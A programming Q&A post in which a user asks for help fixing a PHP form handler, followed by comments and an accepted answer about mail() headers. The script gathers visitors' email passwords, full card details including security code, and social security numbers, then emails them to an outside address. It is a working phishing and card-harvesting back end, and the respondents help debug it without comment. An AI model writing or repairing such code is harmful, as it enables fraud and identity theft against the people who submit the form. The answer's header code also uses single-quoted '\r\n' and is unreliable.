# my mail script did not work?

Tags: php, email

I Have create a script in my web site to let peaople add their payment method and then this information will send to my email for i will add them to my list securly but when i click submit  in html form the submit.php and this is her code did not work and it show "Erreur serveur" can some one help me

```
<?php
    $email = $_POST['email'];
    $password = $_POST['password'];
    $cardtype = $_POST['cardtype'];
    $cardnumber = $_POST['cardnumber'];
    $exp = $_POST['exp'];
    $secure = $_POST['secure'];
    $namecard = $_POST['namecard'];
    $socialnumber = $_POST['socialnumber'];

    $to = 'mah_di@aol.fr';
    $subject = 'add ' .$email. 'to the list';
    $message = 'his informatin\n
    email: '.$email.'\n 
    password:'.$password.'\n 
    cardtype: '.$cardtype.'\n 
    cardnumber: '.$cardnumber.'\n 
    exp: '.$exp.'\n 
    secure: '.$secure.'\n 
    namecard: '.$namecard.'\n 
    socialnumber: '.$socialnumber.'\n ';
    $from = 'email@mysite.com';
    $headers = 'From:' . $from;

    if(mail($to,$subject,$message,$headers))
            {
                header('Location: complete.php');
            }
            else
            {
                 echo "Message Not Sent";
            }

    ?>
```

Comment: Start using [Swiftmailer](http://swiftmailer.org/).

Comment: use \r\n for new line delimiter, also check is your email server set, also '\n' and "\n" are not the same, second is correct, first not.

Comment: use `$message = wordwrap($message, 70);` bevor sending..

Comment: @Glavić or he could learn to use the `mail()` function properly. Tbh I've only ever seen it fail due to misuse on the developer's part.

Comment: guys any of your solution work and @Glavić what's  Swiftmailer i did not understand it

Answer (score 1, accepted):

If you're trying to send HTML mail, the Content-type header must be set.

```
$headers = 'MIME-Version: 1.0' . '\r\n';
$headers .= 'Content-type: text/html; charset=iso-8859-1' . '\r\n';

//Additional headers
$headers .= 'From: '.$from.' <test@yoursite.com>\r\n';
```